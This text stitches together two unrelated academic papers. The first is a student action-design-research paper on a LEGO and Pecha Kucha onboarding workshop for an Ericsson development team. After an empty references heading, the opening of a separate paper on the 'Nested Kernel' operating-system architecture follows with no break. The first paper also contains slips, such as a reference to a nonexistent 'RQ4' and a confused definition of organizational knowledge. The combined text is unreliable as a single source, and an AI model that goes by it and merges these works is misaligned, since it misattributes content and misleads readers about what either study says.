The onboarding process in most IT companies is often insufficient or non-existent. In this paper, an action design research study was conducted to investigate the current onboarding process at Ericsson to find areas for improvement. Two areas were found to be candidates for enhancement: technical knowledge and organizational knowledge. A product-related workshop was developed and integrated into a development team at Ericsson to examine its effect on the effectiveness of the onboarding process. The workshop consisted of Pecha Kucha presentations to enhance technical knowledge, and a LEGO-building session to enhance organizational knowledge. The workshop showed a modest positive improvement in organizational knowledge, and no improvement in technical knowledge. Keywords—Product-related learning, onboarding, evaluation, LEGO, Pecha Kucha, active learning, team-building I. INTRODUCTION Onboarding is the process of socialization during which a novice, such as a new employee or a current employee who enters a new team or project, comprehends and adjusts to the technical and social aspects of a new team, project and/or system [1]. A developer who is established and integrated in a team or project spends around 50 percent of the time on understanding the system, while developing accounts for only 15 percent [2]. During onboarding, the novice often faces challenges, particularly regarding the understanding of the product. This indicates that the most time-demanding task for a developer is also the most demanding task for a novice [3]. An even more considerable issue is that, in many cases, no formal onboarding process is present at all. In the cases where a process is present, however, it is seldom quality-controlled [4]. The absence of quality control means that it is not measured or evaluated whether the onboarding prepares the novice well enough to understand the often big and complex product on which he or she will be working.
For the novice to achieve sufficient knowledge and skills about the product through the onboarding process, the following tasks are essential: (1) comprehension of the code and its connection to other development artifacts, (2) understanding of the development process, (3) knowing who to contact for what issues, and (4) which approach is usually taken to handle issues. These activities must also follow a learning curve, scale to a larger number of novices, and be diverse enough to cover different intended learning outcomes [5]. Ericsson is one of the leading telecom companies in the world competing to release 5G. To remain market leaders, the company is presently going through a re-organization that requires repositioning current employees as well as hiring new employees. These are aspects that bring out the importance of an effective onboarding process. The effectiveness of an onboarding process describes how the characteristics of the individuals, the onboarding and the organization influence the learning activities and their outcomes. For an onboarding process to be effective, it needs to meet the needs (quick and product-related knowledge acquisition) of the organization and the individual during and after the onboarding. To make the onboarding process at Ericsson more effective, a new learning activity is introduced to the onboarding process. A clear connection of the learning activity to concrete product-related learning outcomes is anticipated to help the novice become product-proficient faster. Additionally, it is also anticipated to help the novice become independent and confident in solving issues and seeking help from the right people [5]. Product-related learning refers to tasks that are explicitly related to the product, in the form of user stories and concrete development tasks, as well as issues regarding the environment around the product, such as troubleshooting, architecture and design, and continuous integration machinery.
The goal of this study is to introduce a learning activity that generates a more product-relevant outcome of the onboarding process in one of Ericsson's newly formed teams in the organization CNA. The learning activity and its evaluation are also the main contribution of this study. The learning activity is created and developed by conducting an action design research study [7]. Further, the scientific and technical contributions that this introduced learning activity yields include: - the investigation of the intended learning outcomes of the onboarding process of one team within the CNA organization in Ericsson, - what learning activities are implemented to fulfill the learning outcomes, - what impact these activities and outcomes have on the effectiveness of the onboarding, and - how the effectiveness is evaluated. II. RELATED WORK To develop a learning activity that aims to enhance onboarding effectiveness, it is important to be guided by aspects that make up a successful process, as described by Johnson and Senges [5]. It is based on these four aspects [5], (1) comprehension of the code and its connection to other development artifacts, (2) understanding of the development process, (3) knowing who to contact for what issues, and (4) which approach is usually taken to handle issues, that this learning activity must be created. Further, Johnson and Senges [5] mention the importance of following a learning curve that is steep enough to stimulate the learning of each individual, but not so steep that the learning seems unreachable. Before the development of the artifact can take place, it is also important to research the concrete problem in the development team and compare it to the general problem domain as described by Tiarks [3] and Graybill et al. [4] to establish the concrete problem's relevance to the general discourse. Adequate learning styles, or ways of learning, are another area that impacts the development and evaluation of a learning activity in the onboarding process.
When designing the learning activity, it is important that it is created to yield the best possible learning outcome for the team members. Active learning is described as resulting in high knowledge retention in the students or participants of such an activity. Therefore, during development of the learning activity, Edgar Dale's [8] Cone of Experience was studied to design activities that require active participation of the team members to ensure high retention. In this study, a team-building learning activity was introduced to enhance the product-related learning. According to research [16][17][18], the effect of team-building interventions on productivity is difficult to measure due to the difficulty of separating correlation from causation. Buller and Bell [16] conducted a study in which they analyzed the effect of team-building (and goal setting) on productivity. Their results were inconclusive but indicated a small improvement in some performance and strategy measures. However, the study could not deduce team-building to be the definite cause of the improvements. Salas et al. [18] suggest a non-significant improvement in performance from team-building interventions. According to their conclusions, only around 1 percent of the possible factors of fluctuation in a team's performance can be attributed to team-building interventions. The study also concludes that the effect of team-building interventions diminishes as the size of the team increases. The study by Klein et al. [17] is an update of the Salas et al. [18] study summarized above. In contrast to Salas et al., Klein et al. arrive at the conclusion that team-building has a "positive moderate" effect on factors like performance. The study also investigates how team size affects the team-building impact, indicating that small (fewer than 5 members) and medium (5 to 10 members) teams showed a modest positive effect from team-building.
However, teams with over 10 members seem to have a greater positive impact from team-building. These papers were used to understand the impact that team-building might have on the team in this study. III. RESEARCH METHODOLOGY In order to understand the state of the art of the onboarding at Ericsson and how the onboarding effectiveness can be improved, the following research questions were formulated: RQ1: What are the intended learning outcomes of the onboarding process in the organization CNA within Ericsson, and what learning activities are involved to complete the outcomes? RQ2: What learning activities can be introduced to the current onboarding process to enhance product-related learning? A. Action Design Research Contingent on the research questions, which require gathering of complex and versatile information from individuals within a restricted population with a unique context, where an artifact (the learning activity) is developed and integrated, action design research (ADR) was identified as beneficial for the conduct and outcome of this study. ADR allows for the creation of an ensemble artifact [7], whose creation cycle is not sequential and does not separate development and design from organizational and social context, even upon idea initialization. ADR further allows for the problem formulation, development, intervention and evaluation to happen in parallel to learning and reflection. This leads to a cyclic and iterative nature of artifact development, ensuring that the context in which the artifact is placed is not disregarded. ADR favors a constructivist approach where the artifact is not isolated from its social context. ADR supports two contrasting issues: (1) engaging in a problem situation occurring in a specific organizational setting, through intervention and evaluation, and (2) the construction and evaluation of an artifact that tackles the class of problems represented by the specific situation and organizational setting.
This method is suitable for addressing the RQs, which together form the same concrete contrasting issues: (1) intervention and evaluation of a given situation in a real and unique organizational setting – i.e. the specific team at Ericsson, and (2) constructing and evaluating a learning activity that will be part of the onboarding in the same unique organizational setting. The context is fitting for ADR since many team members are still undergoing onboarding while this study is conducted, which promotes iterative intervention and evaluation throughout the development [7]. In this study, the research was divided into three cycles, or iterations. The first cycle, idea initialization, focuses on the investigation of the current situation of the onboarding, as well as an idea formulation with input from the sample team and the knowledge body. The investigation of the current situation includes learning about the existing onboarding process and its intended outcomes (RQ1). The second cycle, artifact development, was focused on developing an artifact from the knowledge gathered in cycle 1. This development was done together with the team through brainstorming, and through intervention with relevant research in the knowledge body (RQ2), such as papers on Pecha Kucha presentations [15], LEGO workshops [9][12] and active learning [8]. At the end of this cycle, the artifact was implemented with the team. Cycle three, artifact evaluation and analysis, focuses on evaluation and analysis of the implementation of the artifact. The evaluation assesses whether the artifact did improve the effectiveness of the onboarding process. B. The Team The sample team was a development team that is responsible for supporting parts of the continuous integration (CI) machinery. They work with a wide range of different tasks, from trouble reports to visualization tools, and they closely interact with mainly four other CI teams. The sample team consists of five people, who are all developers with various experiences and backgrounds.
All team members were novices in the team. Additionally, there was one more team participating in the workshop. This team was not part of the sample for this research, but participated to enable the learning outcomes for the sample team. C. The Cycles Cycle 1 - Idea Initialization During this cycle, the team members were interviewed about their onboarding process, resulting in a total of five interviews. The interviews elicited the team members' opinions about the onboarding in order to yield an understanding of what the intended learning outcomes are and what activities are involved to reach said outcomes. Based on this information, the idea was formulated to comprise an activity that could improve the effectiveness of the onboarding. Further, the concrete information and the idea based in this team were conceptualized into an instance of the problem domain. This means that there was a connection between the common discourse and the concrete problem in the team, where the onboarding process was ad-hoc (no formal onboarding process was present, and it was not quality-controlled), just as described by other researchers [3][4]. This instance and the generic problem domain were also congruent in the aspect that most novices face challenges in understanding the product in its organizational context [4][5]. The interviews and the research body led up to the formulation of two learning outcomes that could be added to the onboarding to enhance its effectiveness: technical knowledge and organizational knowledge. When the state of the team's onboarding had been investigated and the two learning outcomes established, research within the pedagogical and learning field was consulted to elicit effective ways to reach these learning outcomes. According to Panadero et al. [9] and Dale [8], active learning activities are effective for completing learning objectives and enhancing the learning experience for the participant.
An active learning activity can be identified by participation in, for example, hands-on workshops and collaborative lessons where the participants engage with each other to solve a real problem. According to Dale's [8] cone of experience, the participant can remember 70 to 90 percent of an active learning activity. In activities where the participant does not practice active learning, but rather reads or listens, only 10 to 20 percent of the content is remembered. Together with the possibly high knowledge retention from active learning [8] and the possible modest positive impact from team-building [16][18], the idea of an interactive workshop was formulated. Klein et al. [17] suggest that a larger team size (greater than 10 members) is prone to a more positive impact than a smaller team size. Since the workshop initially was supposed to include four teams (a total of around 30 participants), team-building could possibly be anticipated to be beneficial for the teams. Cycle 2 - Artifact Development During this cycle, the artifact was developed based on the idea formulation from cycle 1. After the data collection in cycle 1, the development of an interactive workshop focused on the learning outcomes of technical and organizational knowledge was initiated. This cycle was dedicated to reviewing various examples of active learning workshops within software engineering that focused on enhancing team building and technical skills. During the development of the artifact, the works by Panadero et al. [9] and Lynch et al. [12] on LEGO workshops were used to learn how interactive LEGO workshops affected the intended learning outcomes. Panadero et al. [9] suggest that the active learning LEGO workshop that they conducted enhanced and stimulated the learning of the participants compared to other non-active learning activities. The LEGO is meant to act as a method or a proxy to achieve the actual learning outcome – in this case, the organizational knowledge. Lynch et al.
[12] imply that their LEGO workshop to ground agile development principles did not significantly enhance knowledge retention of the participants compared to lectures. However, the LEGO workshop was perceived as more enjoyable, an aspect that the researchers deem valuable. Miller Beyer's [15] research on Pecha Kucha presentations compared to plain PowerPoint presentations was used to understand the effect of Pecha Kucha as a way of presenting information. In the paper, Miller Beyer suggests that Pecha Kucha was useful compared to PowerPoint, in the sense that it was more enjoyable during creation and had higher quality during presentation. Pecha Kucha (20x20) [10] is a way of presenting a topic in a concise and efficient way. It can be described as a form of PowerPoint presentation where each slide is shown for exactly 20 seconds, and the presenter is only allowed to use 20 slides. As mentioned earlier, listening merely amounts to around 20 percent remembrance in the participant [8]. To make the Pecha Kucha presentations become an active learning activity, the team was supposed to create the presentations together, and as a final task in the workshop, discuss and present what they learned during the presentation. In this way, the team would participate in designing and performing a presentation, which can yield up to 90 percent knowledge retention, according to Dale's [8] cone. Cycle 3 - Artifact Evaluation and Analysis During this cycle, the workshop was evaluated and analyzed. Two types of evaluation data were collected: quantitative in the form of surveys, and qualitative in the form of observations of the participants during the workshop. Final Evaluation of the Learning Outcomes. When the design and implementation of the learning activity were done, the workshop and the learning outcomes were evaluated. The evaluation was done according to the first two levels of Kirkpatrick's [11] four levels of training evaluation model.
Below follows a description of all four levels of evaluation. In this study, only level 1 and level 2 were conducted due to time constraints. Level 1 – Reaction: This level aims to elicit the feelings, perceptions and experience the participant had of the training. For this study, a survey was conducted to understand how the participants experienced and valued the workshop. This assessment was focused on the organizational knowledge outcome. Level 2 – Learning: This level aims to elicit the learning outcomes of the training. For this study, a test about the other team's product was given before the workshop to assess the knowledge of the participants, and the exact same test was given after the workshop to assess the learning outcome of the activity. This assessment was focused on the technical knowledge outcome. Level 3 – Behavior: This level aims to elicit how the participants practice and utilize their learning, and if and how it has changed their behavior. Level 4 – Results: This level aims to elicit the effect the learning outcomes have on the business and the working environment. Qualitative data – Observations: During the workshop, the groups were observed in their way of working together and in their communication. These observations were used to document the possible changes in behavioral or communication patterns of the participants throughout the workshop. The observations were recorded through field notes. When the observation was completed, the field notes were studied and coded to elicit common or special patterns or behaviors among the participants. D. Threats to Validity The threats to validity of this study are recognized and analyzed below. Construct validity is under threat if no valid model or method can be found according to which the evaluation of the effectiveness of the learning activity can be measured. To mitigate this threat, a recognized model for onboarding or training effectiveness evaluation was used.
This model was first developed in 1959, and has been refined by its creator, Kirkpatrick, as well as by other researchers. The model has been widely used for purposes similar to this study ever since its creation [13][14]. Internal validity could be under threat since I personally know all the team members. The relationship could cause them to give more positive feedback during evaluation of the new learning activity than if it had been introduced by someone they do not know. To mitigate this threat, the risk was brought up with the team members and we discussed how false positive feedback can have negative effects on the study. Emphasis during evaluation was laid on the importance of honest answers and opinions. Even though caution was taken during the study to avoid threats to internal validity, the questions of the workshop evaluation could lead the participants to give exaggerated positive feedback. The positive results of the workshop should therefore be interpreted with vigilance. Another threat is that the evaluation and measurement of the effectiveness of the learning activity is not valid or does not have clear definitions. Because of this, it is important to use a recognized and detailed evaluation model and measurements, to ensure that the results and outcomes of this study are credible. The extensively used Kirkpatrick model [11] was used for this purpose. The small team size and whether that sample is generalizable for the population or other companies might be a threat to external validity. However, rather than favoring quantitative data, this study narrows down to qualitative data points that are studied in depth over time. The sample is small, and it is not possible to establish whether or not the data collected in the study is generalizable for a wider population. However, as mentioned, this study is context-dependent in nature. The reliability of the study is threatened regarding the evaluation and measurement of the learning activity.
If there is no recognized model according to which the effectiveness of the learning activity is measured, this study's results cannot be repeated in any other setting. As mentioned above, Kirkpatrick's model was used. IV. RESULTS In this section, the answers to each research question are presented. RQ1: What are the intended learning outcomes of the onboarding process in the organization CNA within Ericsson, and what learning activities are involved to complete the outcomes? The data collected during the five interviews of cycle one (Idea Initialization) indicates that there is no structured or formulated onboarding process existing for the team. However, for new Ericsson employees there is an "onboarding-event" where the new employees attend presentations about the company's goals, products and different organizations. This is not related to anything concrete at the product-detail level of the team, but is more of an overview of the entire company Ericsson. The interviews also indicated that there are no formulated learning outcomes of the onboarding, and no evaluation or quality control. "They try to communicate, in a way. They tell me to work on this thing, in this way. And I say, for what reason? And they say, well, now we're working on it. But why? It's a part of the system. Yes, it's a part of the system I know but. Its these questions which doesn't really fit anywhere. My questions aren't being answered." says one interviewee when explaining whether and how learning outcomes of the onboarding were presented to them. Regarding the onboarding specifics for this team, three areas of improvement were found to be common among all interviews. These are: • Need of organizational context. "In my case, as developer, I would expect to learn first about the organizational environment, in general about the company. And then where is your team and what you are going to do located in that general map for the company.
I mean, from the big thing, to the specific thing. That would be easier for everyone, who get onboarding in Ericsson. And I didn't get that map. So that was hard. It's a complete world, and there are many abbreviations. So I was lost in the beginning. Could be much easier if I had a one page map. This is Ericsson, this our area, this our team, and this is what the team will do for this product, and then for this area, and then for Ericsson." One example of an interviewee expressing his/her feeling of lack of organizational context in the onboarding process. • Need of technical context. "They think like just because you are watching the RBS [an Ericsson product], its like magically trying to get into your head. Which is, nah, that's the wrong way of thinking about it. But that's what they want basically. They think that people learn way too quick" • Need of knowledge of whom to ask. "I had problem with some [Internal Product] thing, and I sent emails to [Other Team] asking if they know anything. And they are like, no, but we are working on it. I was working on this for like a week and then [Team Member] comes by and says like: Hey, have you asked this guy? And I was just like, No. And then I email him and then 5 minutes later he just send me this 33 pages long API content, and I'm like, You have been sitting on that one? That's kind of a good way of explaining how things work here, some people know it. And you gotta know who to find. And you are probably not gonna find them, until its too late." An example of how an interviewee experienced finding people outside of the team to ask for help. The interviews also conveyed that the onboarding tasks are product-related in the sense that the novices were always working on items from the backlog. They did, however, not get much guidance when taking on the backlog items, but had to rely on help and time from their colleagues.
"And I started to ask questions to others, whoever were like, if I feel like they have some time for me. I started to learn by asking questions actually." This is one interviewee expressing how he/she learned about the backlog items through asking other team members. "And I've been on my own basically. I could ask people. [Manager] told I should ask people, and I did. But still its my own way of coping with it. I like to learn by myself, but I don't think everyone like to do that." Another interviewee on the same matter. RQ2: What learning activities can be introduced to the current onboarding process to enhance product-related learning? Based on the data retrieved for RQ1, a workshop was developed and conducted to answer RQ2. A. The Artifact The artifact had the form of a learning activity aimed at enhancing the product-related learning of the onboarding process. The learning activity was a two-hour workshop divided into two learning outcomes: • technical knowledge, which entails the knowledge about other products, projects and tools that were developed by other teams within the organization, and how the team's own product might be related to said items, • organizational knowledge, which entails the knowledge about the technical skills and knowledge of other teams within the organization. For technical knowledge, a presentation part was performed. The teams had to design presentations according to the Pecha Kucha style [10], where each presentation slide is shown for exactly 20 seconds. This creates concise and clear presentations that do not risk getting stuck in too much detail. Before the workshop, guidelines about how to create Pecha Kucha presentations were sent out to all participants via email. For organizational knowledge, a LEGO-building part was performed. Here, the teams were divided into groups with members from both teams. The groups had the task of building a LEGO city together.
There was a backlog with 11 items, each representing a building or item of the city (such as a shop or a bus). Altogether, 55 minutes were dedicated to the LEGO building. These 55 minutes were divided into three "Sprints". The first two sprints lasted for 20 minutes, and the third for 15 minutes. During a sprint, the team chose as many items as they estimated they could finish. They built the items together, and when they were done, they integrated them with each other's items to form a city. At the end of each sprint, the groups evaluated their building process, their strategies and the result. By practicing teamwork during the LEGO building, the learning outcome can be reached through actively working on a hands-on problem together with the people relevant to increase the organizational knowledge. The LEGO building acts as a simulation of real-world problems, where the participants have to collaborate, come up with strategies and communicate to solve the problems [9][12]. These are skills that are important to achieve organizational knowledge – being able to work and interact with other teams. The whole workshop ended with each team discussing and summarizing their learnings during the workshop. Bloom's [19] taxonomy is a framework to design and evaluate learning objectives or learning outcomes. It is, however, not to be mistaken for an evaluation of a student's knowledge. The framework aims to define the cognitive process while learning new skills. The framework is characterized by sequential levels of difficulty, where the first level has to be mastered before the second can be understood.
The technical knowledge outcome intends to cover the levels: • (1) knowledge – remembering the information presented by the other team, such as products and projects, team members' skills and their Way of Working, • (2) comprehension – being able to understand the other team's products and projects, • (3) application – using the information they remembered and understood from the other team while answering the knowledge test after the workshop, • (4) analysis – connecting the products and projects of the other team to their own products and projects, • (5) synthesis – summarizing the important parts of the other team's presentation to use in the final presentation at the end of the workshop, • (6) evaluation – presenting what they learned at the end of the workshop. The organizational knowledge outcome intends to cover the levels: • (1) knowledge – remembering the names and skills of other team members, • (2) comprehension – being able to understand and communicate the instructions during the workshop together with the other team members, • (3) application – following the instructions to build the LEGO items together with the other team members and interacting with each other to do so, • (4) analysis – analyzing and communicating across the groups to combine the LEGO items to form a coherent LEGO city. This includes comparing building sizes, placements and organization, • (5) synthesis – creating the actual LEGO items and LEGO city together, and presenting what they learned at the end of the workshop, • (6) evaluation – evaluation of the group's own progress during the sprint. This includes being able to describe their building process, strategy and difficulties, and compare these to previous sprints. Initially, four teams within the CNA organization were supposed to take part in the workshop. One of these teams was the sample team.
The other three teams were targeted because they interact with the sample team or work on projects related to its work; hence they were important for the sample team to reach the learning outcomes. Due to busy schedules, only one of the three additional teams was able to attend the workshop, meaning that the sample team and one additional team ended up participating. In total, all five members of the sample team and three members of the other team took part. The participants were divided into three groups during the workshop, distributed so that each group had one member from the other team. This enabled all participants to work towards the organizational knowledge learning outcome.

B. The Sprints - An Observation

During the sprints, the teams were observed to elicit patterns, or changes in behavior over time. Overall, the observations showed unstructured collaboration in two out of three groups during the first sprint. After the first sprint, the collaboration within and between the teams improved. Below follows a chronological summary of the field notes from the observations.

Sprint 1: During the first sprint, only one team worked systematically and in a structured manner. The team started by gathering a pile of LEGO and then discussed its building strategy before starting. During the building phase, the team often stopped for discussions and re-evaluation of its building, and all team members actively took part in the discussions. In the other two teams, there was no structure. Each member was focused on themselves and their own building, and all members were building on the same thing at the same time without discussing a shared view of the final result. Instead of stopping to discuss and re-evaluate, this resulted in frequent exclamations of stress and frustration among some members.
It also resulted in the buildings falling apart several times during construction, due to too many hands working on the same thing. All teams managed to finish their items before the sprint ended. After the first sprint, there was a 15-minute break. The idea behind the break was to make the participants talk to each other outside of their roles as colleagues; this goal was not revealed to the participants. During the break, the participants all actively took part in discussions about various personal matters, ranging from previous work experience to sports and cultural differences among them.

Sprint 2: During the second sprint, the two unstructured teams displayed a difference in their behavior. The systematic team did not show much difference but continued to work efficiently in the same manner. In the other two teams, the members took on different roles: in both teams, one member took the role of a “gatherer”, collecting LEGO while the other two members were building. During this sprint, it was also possible to see that they were discussing the intended end results within the teams and planning how to build their items accordingly. The noise level in the room also became much lower, due to less frequent exclamations of stress and frustration. The teams put effort into building more complex and aesthetically appealing items during this sprint. Interestingly, all teams also started to look at their own and others’ previous items for size references.

Sprint 3: In the third sprint, the teams did not display much difference in behavior compared to sprint 2, but continued to work systematically and to stop for discussions and re-evaluations. After the presentations and LEGO sessions were done, the teams were asked to discuss, within their original development teams, what they had learned about the other development team’s members. All participants expressed that they had gotten to know members of the other team better.
They understood that they could work well together under pressure, even though they have different backgrounds, and that if you have a common goal, you can work with anyone sharing that goal. During the presentation, all participants expressed that they felt it would be easier to cooperate with the other team after this workshop. After the workshop, the team filled in a form evaluating the workshop; see Figures 1-6 for the results. Four out of five team members filled in the form. The team also filled in a knowledge test, once before the workshop and once after; five out of five team members answered the knowledge tests. The knowledge tests do not show improvement after the workshop: the team members already answered all questions correctly beforehand. To conclude RQ2, the study showed some indication of improvement regarding organizational knowledge. The participants expressed through their final presentations during the workshop that the LEGO building enhanced the collaboration between the two teams. In the workshop survey, the results indicated that the workshop was relevant for their job and that it had stimulated their learning. The knowledge tests showed that the technical knowledge learning outcome was not improved by the workshop.

V. DISCUSSION

Regarding RQ1, the findings in this study are congruent with the literature describing the general problem [3][4]: there was no standardized onboarding process in the team. The team members expressed that they lacked an introduction on how to navigate the system, both technically and organizationally, and on how to understand the context in which they are working. This includes the relationship of their products to others, as well as which team or person to contact when a problem arises. Such an onboarding could be developed in the near future.
As of now, the team is newly formed and the area in which they are working is also in a start-up phase at Ericsson, which could explain the lack of a formal onboarding. Regarding RQ4, the evaluation of the workshop implied that the participants found the workshop to be valuable for their job. However, these results are possibly biased, since the questions in the survey could be leading towards a positive answer. Another aspect is that the team members know me (the writer) and I work in their team, which could lead to a more positive evaluation of the workshop than had they not known me. When the workshop was evaluated according to the first two levels of Kirkpatrick’s model, the results showed the following:

Level 1 - Reaction: The results indicate that the team members found the workshop to stimulate their learning and that its learning outcomes could be of value in their future work. These findings are supported by other studies suggesting that active learning activities, such as LEGO building, have a positive effect on the effectiveness and experience of learning [8][9].

Level 2 - Learning: The Pecha Kucha presentations did not improve the knowledge of the team members. The main reason for this is that the team already had basic knowledge about the products and tools that the other team is developing. Another reason could be that the teams did not put enough effort into their presentations: instead of strictly following the Pecha Kucha principle of concise and effective presentations, the teams crammed a lot of information into the slides and spoke at very high speed. A future suggestion would be to allocate time for a Pecha Kucha introduction for all participating teams, since sending guidelines via email did not seem to be enough for the participants to follow the Pecha Kucha concept fully.
Interestingly, the break during the workshop showed indications that, after chatting freely with each other, the teamwork improved from being unstructured and centered on each individual’s own building to being cooperative and including discussions about the end result. However, this could also be because the teams felt more secure in the second sprint: they knew what was expected of them and were able to focus on the anticipated end result. It is not possible to determine which of these two factors caused the change, whether it was a combination of both, or whether there was a different cause altogether. According to Buller and Bell [16], Klein et al. [17] and Salas et al. [18], the impact of team-building on team outcomes is rather ambiguous: it is difficult to single out team-building as the main factor behind improved outcomes. In this study as well, it is not possible to determine exactly which factors caused the team to perform better after the first sprint. To conclude, a product-related learning activity in the form of a workshop focusing on technical knowledge and organizational knowledge (team-building) through active learning showed indications that the organizational knowledge could be enhanced. The results point towards an improvement in team-building. However, there is a risk of biased outcomes due to the fact that the writer is a colleague of the sample team. The short time frame is also a constraint: to yield strong results, the team needs to be studied over time for an evaluation according to levels 3 and 4 of Kirkpatrick’s [11] model. According to the knowledge tests, the technical knowledge did not show any indication of improvement after the workshop; the team already displayed good knowledge of the other team’s projects beforehand. Had all four initial teams been able to participate, the outcome would probably have been different, since the other teams do not work as closely with the sample team as the two participating teams do with each other.
The sample team therefore probably does not have equally good prior knowledge of those teams’ products, and their Pecha Kucha presentations might have taught them something.

VI. CONCLUSIONS

The objective of this paper is to describe the process and the results of how a product-related learning activity impacted the effectiveness of the onboarding in a development team at Ericsson. A product-related and interactive workshop was developed and implemented. The workshop had two product-related learning outcomes: technical knowledge and organizational knowledge. It consisted of two parts: a Pecha Kucha presentation focused on the technical knowledge, and a LEGO-building session focused on team-building to enhance the organizational knowledge. The results of the evaluation of this workshop suggest that it might have had a positive impact on the onboarding, since the results indicate a moderate enhancement of the organizational knowledge of the members of the development team. It is, however, not possible to declare team-building to be the cause of this enhancement in organizational knowledge. The workshop showed no indication of improved technical knowledge among the team members. Future work will include following up this study with an evaluation according to Kirkpatrick’s [11] evaluation model: level 3, where the everyday behavior and social interaction between the two teams will be evaluated through interviews and observations, and level 4, where the manager will be interviewed to understand if and how the quality of the team’s everyday work has been impacted. Further, when time can be allocated with the other teams that were intended to join the workshop, one more workshop will be conducted and evaluated according to the same model. Should the second workshop yield even a modest positive impact on the learning of the team members and the effectiveness of the onboarding, there is a possibility that this workshop could be implemented in other teams within CNA as well.
If time and circumstances allow, that future work could be done as an update or continuation of this study. VII. ACKNOWLEDGEMENTS I thank my supervisor Jan-Philipp Steghöfer for the support and interesting discussions. REFERENCES
Nested Kernel: An Operating System Architecture for Intra-Kernel Privilege Separation

Nathan Dautenhahn, Theodoros Kasampalis, Will Dietz, John Criswell, and Vikram Adve
University of Illinois at Urbana-Champaign; University of Rochester
{dautenh1, kasampa2, wdietz2, vadve}@illinois.edu, criswell@cs.rochester.edu

Abstract

Monolithic operating system designs undermine the security of computing systems by allowing single exploits anywhere in the kernel to enjoy full supervisor privilege. The nested kernel operating system architecture addresses this problem by “nesting” a small isolated kernel within a traditional monolithic kernel. The “nested kernel” interposes on all updates to virtual memory translations to assert protections on physical memory, thus significantly reducing the trusted computing base for memory access control enforcement. We incorporated the nested kernel architecture into FreeBSD on x86-64 hardware while allowing the entire operating system, including untrusted components, to operate at the highest hardware privilege level by write-protecting MMU translations and de-privileging the untrusted part of the kernel. Our implementation inherently enforces kernel code integrity while still allowing dynamically loaded kernel modules, thus defending against code injection attacks. We also demonstrate that the nested kernel architecture allows kernel developers to isolate memory in ways not possible in monolithic kernels by introducing write-mediation and write-logging services to protect critical system data structures. Performance of the nested kernel prototype shows modest overheads: < 1% average for Apache and 2.7% for kernel compile. Overall, our results and experience show that the nested kernel design can be retrofitted to existing monolithic kernels, providing important security benefits.
Categories and Subject Descriptors: D.4.6 [Operating Systems]: Organization and Design

Keywords: intra-kernel isolation; operating system architecture; malicious operating systems; virtual memory

1. Introduction

Critical information protection design principles, e.g., fail-safe defaults, complete mediation, least privilege, and least common mechanism [34, 40, 41], have been well known for several decades. Unfortunately, monolithic commodity operating systems (OSes), like Windows, Mac OS X, Linux, and FreeBSD, lack sufficient protection mechanisms with which to adhere to these design principles. As a result, these OS kernels define and store access control policies in main memory which any code executing within the kernel can modify. The impact of this default, shared-everything environment is that the entirety of the kernel, including potentially buggy device drivers [12], forms a single large trusted computing base (TCB) for all applications on the system. An exploit of any part of the kernel allows complete access to all memory and resources on the system. Consequently, commodity OSes have been susceptible to a range of kernel malware [27] and memory corruption attacks [5]. Even systems employing features such as non-executable pages, supervisor-mode access prevention, and supervisor-mode execution protection are susceptible to both user level attacks [25] and kernel level threats that directly disable these protections. Traditional methods of applying these principles in OS kernels either completely abandon monolithic design (e.g., microkernels [3, 9, 28]) or rely upon transparent enforcement of isolation via an external virtual machine monitor (VMM) [15, 35, 44, 55, 56]. Microkernels require extensive redesign and implementation of the operating system. VMMs suffer from both performance issues and a lack of semantic knowledge at the OS level to transparently support protection easily; also, generating semantic knowledge has been shown to be circumventable [6].
More recent techniques to split existing commodity operating systems into multiple protection domains using page protections [46] or software fault isolation (SFI) [18] incur high overhead and continue to trust “core” kernel code (which may not be all that trustworthy [15, 16]). To address this problem, we present a new OS organization, the nested kernel architecture, which restricts MMU control to a small subset of kernel code, effectively “nesting” a memory protection domain within the larger kernel. The key design feature in the nested kernel architecture is that a very small portion of the kernel code and data operate within an isolated environment called the nested kernel; the rest of the kernel, called the outer kernel, is untrusted. The nested kernel architecture can be incorporated into an existing monolithic commodity kernel through a minimal reorganization of the kernel design, as we demonstrate using FreeBSD 9.0. The nested kernel isolates and mediates modifications to itself and other protected memory by 1) configuring the MMU such that all mappings to protected pages (minimally the page-table pages (PTPs)) are read-only, and 2) ensuring that those policies are enforced at runtime while the untrusted code is operating. Although similar to a microkernel, the nested kernel only requires MMU isolation and maintains a single monolithic address space abstraction between trusted and untrusted components. We present a concrete prototype of the nested kernel architecture, called PerspicuOS, that implements the nested kernel design on the x86-64 architecture. PerspicuOS introduces a novel isolation technique where both the outer kernel and nested kernel operate at the same hardware privilege level—contrary to isolation in a microkernel where untrusted code operates in user-mode. 
PerspicuOS enforces read-only permissions on outer kernel code by employing existing, simple hardware mechanisms, namely the MMU, IOMMU, and the Write-Protect Enable (WP) bit in CR0, which enforces read-only policies even on supervisor-mode writes. By using the WP-bit, PerspicuOS efficiently toggles write-protections on transitions between the outer kernel and nested kernel without swapping address spaces or crossing traditional hardware privilege boundaries. PerspicuOS ensures that the outer kernel never disables write-protections (e.g., via the WP-bit) by 1) de-privileging the outer kernel code and 2) maintaining that de-privileged code state by enforcing lifetime kernel code integrity—a key security property explored by several previous works, most notably SecVisor and NICKLE. PerspicuOS de-privileges outer kernel code by replacing instances of writes to CR0 with invocations of nested kernel services and enforces lifetime kernel code integrity by restricting outer kernel code execution to validated, write-protected code. In this way PerspicuOS creates two virtual privileges within the same hardware privilege level, thus virtualizing ring 0. By isolating the MMU, the nested kernel architecture can enforce intra-kernel memory isolation policies that trust only the nested kernel. Therefore, the nested kernel architecture exposes two intra-kernel write-protection services to kernel developers: write-mediation and write-logging. Write-mediation enables kernel developers to deploy security policies that isolate and control access to critical kernel data, including kernel code. In some cases, data may require valid updates from a large portion of the kernel, making it hard to protect kernel objects in place, or otherwise not have an applicable write-mediation policy; consequently, we present the write-logging interface that ensures all modifications to protected kernel objects are recorded (a design principle suggested by Saltzer et al. [41]). 
